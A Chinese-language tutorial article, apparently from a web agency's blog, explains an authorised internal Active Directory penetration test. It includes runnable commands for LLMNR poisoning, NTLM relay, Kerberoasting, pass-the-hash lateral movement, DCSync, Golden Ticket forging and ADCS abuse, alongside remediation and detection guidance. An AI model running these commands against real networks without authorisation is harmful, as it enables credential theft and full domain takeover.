Anthropic-Cybersecurity-Skills 实战指南:企业内部网络渗透测试的完整攻击流程与证据链工作流

发布时间:2026/9/12 6:17:19
Anthropic-Cybersecurity-Skills 实战指南:企业内部网络渗透测试的完整攻击流程与证据链工作流 Anthropic-Cybersecurity-Skills 实战指南企业内部网络渗透测试的完整攻击流程与证据链工作流【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills本篇文章以 Anthropic-Cybersecurity-Skills 仓库中conducting-internal-network-penetration-test技能的 workflows.md 为核心骨架系统拆解内部网络渗透测试的攻击流程Attack Flow与证据收集工作流Evidence Collection Workflow。通过结合该技能包内的 SKILL.md 五阶段操作手册、api-reference.md 工具参考、standards.md 标准映射以及 process.py 自动化脚本源码读者将掌握一条从「已攻破内网」位置出发、覆盖网络发现、凭据攻击、横向移动、提权到影响演示与报告的完整作战链路以及一套可直接复制的证据归档目录结构。一、Workflows 文档定位攻击流程与证据链的蓝图在conducting-internal-network-penetration-test技能包中workflows.md 扮演的是「作战蓝图」角色与其余文件形成互补关系文件角色相对路径SKILL.md五阶段完整操作手册命令级SKILL.mdworkflows.md攻击流程总览 证据收集目录结构workflows.mdapi-reference.md库、命令、检测事件 ID 速查api-reference.mdstandards.mdPTES / MITRE ATTCK / 合规要求映射standards.mdassets/template.md报告输出模板template.mdscripts/process.py自动化编排脚本process.pyscripts/agent.pyAgent 化探测脚本agent.pyWorkflows 文档虽然篇幅精炼但它把整个测试从头到尾压成两条可执行的骨架攻击流程六阶段递进与证据收集工作流五类证据归档。下文将以此为纲逐一展开并结合仓库源码深化。二、攻击流程总览六阶段递进式作战地图workflows.md 给出的攻击流程是一个典型的「假设失陷Assumed Breach」模型Network Access (Ethernet/VPN) │ ├── Network Discovery (Nmap, ARP scan) │ ├── Credential Capture (Responder, mitm6) │ │ │ └── Hash Cracking (Hashcat) │ ├── AD Enumeration (BloodHound, LDAP) │ │ │ ├── Kerberoasting │ ├── AS-REP Roasting │ └── GPP Password Extraction │ ├── Lateral Movement (PsExec, WMI, WinRM) │ │ │ └── Credential Harvesting (Mimikatz, LSASS dump) │ ├── Privilege Escalation │ │ │ ├── Local (unquoted paths, token impersonation) │ └── Domain (DCSync, Golden Ticket, ADCS) │ └── Impact Demonstration ├── Sensitive data access ├── Domain compromise proof └── Attack path documentation该流程图在 SKILL.md 中被展开为五个可操作的 Phase。以下按阶段逐一拆解。Phase 1 — 网络发现与枚举Network Discovery and Enumeration核心目标确认测试者的网络位置圈定存活主机与开放服务。# 确认自身网络位置 ip addr show ip route show cat /etc/resolv.conf # ARP 扫描本地子网存活主机 arp-scan --localnet --interface eth0 # Nmap 主机发现覆盖三大内网网段 nmap -sn 10.0.0.0/8 --exclude 10.0.0.1 -oG internal_hosts.gnmap nmap -sn 172.16.0.0/12 -oG internal_hosts_172.gnmap nmap -sn 192.168.0.0/16 -oG internal_hosts_192.gnmap # 从 grepable 输出中提取存活主机 grep Status: Up internal_hosts.gnmap | awk {print $2} live_hosts.txt # 存活主机全端口服务探测前 1000 端口 nmap -sS -sV -T4 -iL live_hosts.txt -oA internal_tcp_scan # 按服务分类的针对性扫描 nmap -p 445 --open -iL live_hosts.txt -oG smb_hosts.gnmap nmap -p 3389 --open -iL live_hosts.txt -oG rdp_hosts.gnmap nmap -p 22 --open -iL live_hosts.txt -oG ssh_hosts.gnmap nmap -p 1433,3306,5432,1521,27017 --open -iL live_hosts.txt -oG db_hosts.gnmap源码印证仓库中的自动化脚本 process.py 将这一阶段完全脚本化。其discover_hosts()函数L34-L57执行nmap -sn subnet -oA主机发现并直接解析.gnmap文件中的Status: Up行生成live_hosts.txt——这与上面手工命令的 awk 提取逻辑一一对应。随后port_scan()L60-L71对存活主机执行nmap -sS -sV -T4 --top-ports 1000即上述手工全端口探测的自动化版本。更细节的是 agent.py 的run_nmap_scan()L14-L29预置了三种扫描档位quick-sV -sC --top-ports 100 -T4、full-sV -sC -p- -T3、stealth-sS -Pn -T2 --top-ports 1000供不同噪声容忍度场景选用。AD 枚举BloodHound 与 LDAP# NetExec 批量枚举共享/用户/组 netexec smb 10.0.0.0/24 -u testuser -p Password123 --shares netexec smb 10.0.0.0/24 -u testuser -p Password123 --users netexec smb 10.0.0.0/24 -u testuser -p Password123 --groups # LDAP 枚举用户及其所属组 ldapsearch -x -H ldap://10.0.0.5 -D testusercorp.local -w Password123 \ -b DCcorp,DClocal (objectClassuser) sAMAccountName memberOf # GPP 密码与 LSA 机密提取 netexec smb 10.0.0.5 -u testuser -p Password123 --gpp-passwords netexec smb 10.0.0.5 -u testuser -p Password123 --lsa # BloodHound 数据采集导入 GUI 做攻击路径分析 bloodhound-python -u testuser -p Password123 -d corp.local -ns 10.0.0.5 -c all # 传统枚举工具 enum4linux-ng -A 10.0.0.5 -u testuser -p Password123源码印证这一环节在仓库中至少有三处自动化佐证process.py 的run_bloodhound_collection()L122-L139执行bloodhound-python -c all --output-prefix即 SKILL.md 中 BloodHound 采集的完整封装process.py 的enumerate_smb_shares()L74-L94逐主机执行netexec smb --shares并将结果以 JSON 落盘agent.py 的enumerate_ad_info()L60-L76使用ldap3库直连 DC先查询(objectClasscomputer)收集主机清单再查询((objectClassuser)(adminCount1))定位高权限管理账户——这一「先找资产、再找管理账户」的顺序正是为后续横向移动与提权铺路。工具速查来自 api-reference.md库/工具安装/命令用途ldap3pip install ldap3LDAP 查询做 AD 枚举impacketpip install impacketSMB 中继、凭据转储、横向移动全套工具python-nmappip install python-nmapnmap 扫描的 Python 封装nmapnmap -sV -sC --top-ports 1000 target服务版本与脚本扫描服务枚举要点SKILL.md 还覆盖了 SMB 共享smbclient -L/smbmap -R、SNMPsnmpwalk -v2c -c public、DNS 区域传送dig axfr corp.local、NFS 导出showmount -e与 MSSQL 枚举impacket-mssqlclient -windows-auth。其中 SNMP、区域传送、NFS 均可作为未认证场景下的快速突破口在真实测试中优先执行。三、凭据攻击阶段从「抓取」到「破解」workflows.md 将 Credential Capture 与 Hash Cracking 画成一条递进支线SKILL.md 的 Phase 2 将其落地为两条路径网络层凭据抓取与离线口令攻击。网络凭据抓取LLMNR/NBT-NS/mDNS 投毒与中继# Responder 投毒LLMNR/NBT-NS/mDNS sudo responder -I eth0 -dwPv # 查看捕获的 NTLMv2 哈希 cat /usr/share/responder/logs/NTLMv2-*.txt # mitm6 — IPv6 DNS 接管 sudo mitm6 -d corp.local # ntlmrelayx — 中继捕获的凭据-socks 建立持续会话 impacket-ntlmrelayx -tf smb_targets.txt -smb2support -socks # PetitPotam — 强制触发 NTLM 认证 python3 PetitPotam.py -u testuser -p Password123 -d corp.local \ attacker_ip 10.0.0.5源码印证SMB 中继攻击是否可行取决于目标是否强制 SMB 签名。仓库对此做了双重检测实现agent.py 的check_smb_signing()L32-L45用nmap --script smb2-security-mode -p 445探测若返回not required即判定vulnerable_to_relay: True并给出HIGH严重级别——与 api-reference.md 中「SMB signing disabled → NTLM relay attacks → CVSS 7.5」的条目完全对应process.py 的check_smb_signing()L97-L119则通过netexec smb --gen-relay-list直接产出relay_targets.txt即 ntlmrelayx 的-tf目标清单输入并统计signing:False主机数。口令攻击离线破解与在线喷洒# 破解 NTLMv2 哈希hashcat 模式 5600 hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule # 密码喷洒务必注意账户锁定策略 netexec smb 10.0.0.5 -u users.txt -p Spring2025! --no-bruteforce netexec smb 10.0.0.5 -u users.txt -p Company2025! --no-bruteforce # Kerberoasting — 攻击服务账户 SPN impacket-GetUserSPNs corp.local/testuser:Password123 -dc-ip 10.0.0.5 \ -outputfile kerberoast_hashes.txt hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt # AS-REP Roasting — 攻击未启用预认证的账户 impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.5 \ -outputfile asrep_hashes.txt hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt关键参数说明hashcat -m 5600 NetNTLMv2Responder 捕获的哈希-m 13100 KerberoastTGS-REP-m 18200 AS-REP Roast。三者哈希格式不同必须选对模式--no-bruteforce确保喷洒时每个用户只尝试一次该密码规避锁定策略喷洒前可先用netexec --pass-pol获取域密码策略process.py 的check_password_policy()L142-L152 即封装此调用。四、横向移动与提权放大失陷半径workflows.md 在 Lateral Movement 支线标注了 PsExec / WMI / WinRM 三种通道并向下挂出 Credential HarvestingMimikatz、LSASS dumpPrivilege Escalation 支线则区分了本地unquoted paths、token impersonation与域级DCSync、Golden Ticket、ADCS两类手段。横向移动命令集# Pass-the-Hash哈希直传无需明文密码 impacket-psexec corp.local/admin10.0.0.30 \ -hashes :aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b # WMI 执行非交互、留痕相对少 impacket-wmiexec corp.local/admin:AdminPass12310.0.0.30 # Evil-WinRM — PowerShell 远程会话 evil-winrm -i 10.0.0.30 -u admin -p AdminPass123 # SMBExec impacket-smbexec corp.local/admin:AdminPass12310.0.0.30 # RDP xfreerdp /v:10.0.0.30 /u:admin /p:AdminPass123 /cert-ignore /dynamic-resolution # SSH 动态隧道 proxychains 打穿内网 ssh -D 9050 user10.0.0.40 proxychains nmap -sT -p 80,443,445,3389 10.10.0.0/24本地提权检查# Meterpreter 会话内提权 meterpreter getsystem meterpreter run post/multi/recon/local_exploit_suggester # PowerUpPowerShell 提权审计 powershell -ep bypass -c Import-Module .\PowerUp.ps1; Invoke-AllChecks # 未加引号的服务路径检查 wmic service get name,pathname,startmode | findstr /i /v C:\Windows | findstr /i /v # Linux 侧LinPEAS 传统检查 ./linpeas.sh sudo -l find / -perm -4000 -type f 2/dev/null cat /etc/crontab域级提权终点站# DCSync需复制权限— 域内全部哈希 impacket-secretsdump corp.local/domainadmin:DaPass12310.0.0.5 -just-dc # Golden Ticketkrbtgt 哈希 impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-... \ -domain corp.local administrator # Silver Ticket服务账户哈希定向伪造服务票据 impacket-ticketer -nthash service_hash -domain-sid S-1-5-21-... \ -domain corp.local -spn MSSQL/db01.corp.local administrator # ADCS 利用Certifried / ESC1-ESC8 certipy find -u testusercorp.local -p Password123 -dc-ip 10.0.0.5 certipy req -u testusercorp.local -p Password123 -target ca01.corp.local \ -template VulnerableTemplate -ca CORP-CA -upn administratorcorp.local框架映射来自 standards.md上述攻击手段在 MITRE ATTCK 中分别对应 Lateral Movement 的 T1021.002 与 T1550.002Pass the Hash、Credential Access 的 T1003OS Credential Dumping、Privilege Escalation 的 T1484Domain Policy Modification。在仓库的 attack-navigator-layer.json 中conducting-internal-network-penetration-test也被挂载到多个技战术节点如 T1046、T1210 等说明该技能与项目整体的 MITRE ATTCK 覆盖矩阵存在直接映射关系。五、影响演示阶段只证明、不破坏# 访问敏感共享演示性读取 smbclient //10.0.0.10/Finance -U domainadmin%DaPass123 dir get Q4_Financial_Report.xlsx # 数据库访问 impacket-mssqlclient sa:DbPassword12310.0.0.20 SQL SELECT name FROM sys.databases; SQL SELECT TOP 10 * FROM customers; # 写入证明文件严禁外泄真实数据 echo PENTEST-PROOF-INTERNAL-$(date %Y%m%d) /tmp/proof.txt # 记录完整访问链 # Initial Access - Responder - NTLMv2 crack - Lateral to WS01 # - Local admin - Mimikatz - DA creds - DCSync - Full domain compromise这里必须强调两个红线影响演示只读取最小必要数据以证明访问能力绝不批量外泄真实数据攻击链记录要逐步对应到 MITRE 技战术 ID为报告提供可追溯证据。六、证据收集工作流结构化的证据归档workflows.md 的第二部分给出了完整的证据目录结构这是把「测试过程」变成「可辩护报告」的关键evidence/ ├── credentials/ │ ├── responder_captures/ │ ├── cracked_hashes/ │ └── dumped_creds/ ├── screenshots/ ├── bloodhound/ │ └── domain_data.json ├── scan_results/ │ ├── nmap/ │ └── shares/ └── attack_paths/ └── path_documentation.md各目录的证据内容与对应来源目录存放内容对应阶段/工具credentials/responder_captures/Responder 捕获的 NTLMv2 哈希原始日志Phase 2/usr/share/responder/logs/NTLMv2-*.txtcredentials/cracked_hashes/hashcat 破解出的明文口令及模式Phase 2hashcat -m 5600/13100/18200credentials/dumped_creds/Mimikatz / secretsdump 转储的凭据Phase 3/4screenshots/关键操作界面与证明文件截图全过程bloodhound/domain_data.jsonBloodHound 采集的域关系数据Phase 1bloodhound-python -c allscan_results/nmap/nmap 的.gnmap/.xml/.nmap输出Phase 1-oA三件套scan_results/shares/共享枚举结果Phase 1/4netexec --shares/smbmapattack_paths/path_documentation.md攻击路径文字化记录Phase 5源码印证这个目录蓝图在自动化脚本中有对应落地。process.py 默认将全部产出写入--output指定目录默认./results并生成了与之对齐的文件命名host_discovery.gnmap对应scan_results/nmap/、smb_shares.json对应scan_results/shares/、bloodhound*.json对应bloodhound/、internal_pentest_report.md对应attack_paths/的报告汇总。也就是说用脚本跑完一轮输出目录天然就是一份结构化的证据包。报告与证据的组织template.md 提供了报告正文骨架Document Control客户、测试类型、访问模型、周期、密级→ Executive Summary范围、关键发现统计、攻击路径摘要→ Technical Findings每条发现含 Severity / CVSS v3.1 / MITRE ATTCK / 受影响资产 / 复现步骤 / 证据 / 修复建议→ Recommendations PriorityP1-P4 优先级与时间线。每个「发现」条目的Evidence 字段应直接引用上面 evidence/ 目录中的具体文件。七、发现分级与修复建议矩阵workflows.md 的攻击流程终点是「Attack path documentation」SKILL.md 的 Phase 5 给出了两类可直接复用的输出模板。攻击路径文档示例Attack Path 1: Domain Compromise via LLMNR Poisoning Step 1: LLMNR/NBT-NS poisoning captured NTLMv2 hash (T1557.001) Step 2: Hash cracked offline — user: jsmith, password: Welcome2025! Step 3: jsmith had local admin on WS042 — lateral movement via PsExec (T1021.002) Step 4: Mimikatz extracted DA credentials from WS042 memory (T1003.001) Step 5: DCSync with DA credentials — all domain hashes extracted (T1003.006) Impact: Complete domain compromise from unauthenticated network position每一步都同时记录技术动作 MITRE ATTCK 编号这正是 workflows.md 中「Impact Demonstration → Attack path documentation」环节的标准呈现方式。发现严重度矩阵FindingCVSSMITRE ATTCKRemediationLLMNR/NBT-NS poisoning8.1T1557.001通过 GPO 禁用 LLMNR/NBT-NSKerberoastable service accounts7.5T1558.003使用 gMSA密码 25 字符Local admin reuse8.4T1078部署 LAPS本地管理员密码唯一化Weak domain passwords7.2T1110强制 14 字符黑名单拦截常见密码Unrestricted DCSync9.8T1003.006审计复制权限实施分层管理模型源码印证上述修复建议并非凭空而来。process.py 的generate_report()L155-L190在自动生成的internal_pentest_report.md中内置了完全一致的六条 Recommendations启用 SMB 签名、禁用 LLMNR/NBT-NS、部署 LAPS、分层管理模型、强密码策略14 字符、使用 gMSA。这意味着自动化报告与人工报告的结论口径保持统一。八、检测侧视角蓝队应关注的 Event ID作为对攻击流程的反向映射api-reference.md 给出了四条关键 Windows 安全事件测试团队在获得授权后可主动要求 SOC 侧开启监控也便于双方在同一批日志上对齐证据Event ID描述对应攻击阶段4625登录失败暴力破解指标密码喷洒4648显式凭据登录横向移动PsExec/WMI 等4768Kerberos TGT 请求预认证相关攻击4769Kerberos 服务票据请求Kerberoasting九、标准与合规映射standards.md 将本技能绑定到主流框架与合规要求方法论框架PTES、OSSTMM v3、NIST SP 800-115、MITRE ATTCK Enterprise核心 ATTCK 技术T1046网络服务发现、T1557.001LLMNR/NBT-NS 投毒、T1558.003Kerberoasting、T1003凭据转储、T1021.002SMB 远程服务、T1550.002Pass the Hash、T1484域策略修改、T1039网络共享数据收集合规触发点PCI DSS v4.0 要求 11.4.2每年内部渗透测试、ISO 27001 A.18.2.3技术符合性评审、SOC 2 CC7.1检测与监控、NIST CSF PR.IP-12 / DE.CM。同时技能自身的 frontmatter见 SKILL.md L19-L34声明了 D3FEND 技术如 Application Protocol Command Analysis、Network Traffic Analysis与 NIST CSF 控制项ID.RA-01、ID.RA-06、GV.OV-02、DE.AE-07使其能够被依赖框架映射的 Agent 与 SIEM 工作流直接消费。十、自动化落地一条命令跑完核心流程workflows.md 的蓝图最终可以收敛到仓库提供的两条自动化路径路径 A流程编排推荐用于完整测试周期python skills/conducting-internal-network-penetration-test/scripts/process.py \ --subnet 10.0.0.0/24 \ --domain corp.local \ --dc-ip 10.0.0.5 \ --username testuser \ --password Password123 \ --output ./results脚本按「主机发现 → 端口扫描 → SMB 签名检查 → 共享枚举 → BloodHound 采集 → 密码策略 → 报告生成」顺序编排main()L193-L228与 workflows.md 的 Attack Flow 完全同构未提供凭据时自动跳过 AD 相关环节仅做未认证视角的扫描与检查。路径 BAgent 化快速探测适用于单目标初筛python skills/conducting-internal-network-penetration-test/scripts/agent.py \ --target 10.0.0.30 \ --dc-ip 10.0.0.5 --domain corp.local \ --username testuser --password Password123 \ --output report.jsonagent.py 的run_pentest()L96-L126依次输出开放端口、SMB 签名状态、LLMNR/NBT-NS 风险与 AD 枚举结果以 JSON 落盘——适合作为内网渗透的「侦察前置」或交给 LLM Agent 编排成更大规模的扫描任务。结语从 workflows.md 的两张蓝图出发本技能包实际交付了一条完整可执行的内部网络渗透测试链路网络发现定位资产 → 凭据抓取与破解 → AD 深挖 → 横向移动与提权 → 影响演示 → 结构化证据与报告。无论是手工执行 SKILL.md 中的命令序列还是调用 process.py / agent.py 实现自动化其流程骨架与证据归档规范都是同一套标准——这正是该技能在 AI Agent 安全测试场景下可复现、可审计的核心价值。请务必仅在获得书面授权的范围内开展测试所有操作以 SKILL.md 中的法律声明为前提。【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

关于本文作者

来自尧图内容编辑团队

尧图内容编辑团队 内容团队

尧图内容编辑团队

本文由尧图网络内容编辑团队执笔。团队由资深项目经理、前端工程师与设计师组成,所有内容均来自亲手交付的真实项目,先讲清问题、再给出可落地的解法。尧图深耕北京网站建设十年,服务过京华建材集团、智造科技等各行业客户,把一线经验沉淀为可复用的行业观察。

  • 十年建站经验,覆盖建材、制造、服务、文创等
  • 项目经理把关选题与事实准确性
  • 工程师与设计师联合撰写专业细节
  • 统一编辑规范,保证文风与排版一致
  • 每月复盘转化数据,迭代选题方向

延伸阅读

相关资讯与近期热门内容

深度阅读推荐

建站决策前值得细读的三篇

网站改版的5个关键决策
2024-08-12

网站改版的5个关键决策

什么时候该改版、改到什么程度、如何避免流量掉光,京华建材集团改版复盘给出答案。

获取专属建站方案

看完文章,把您的行业与预算告诉我们,免费获取一份量身定制的官网建设方案与报价。

立即免费咨询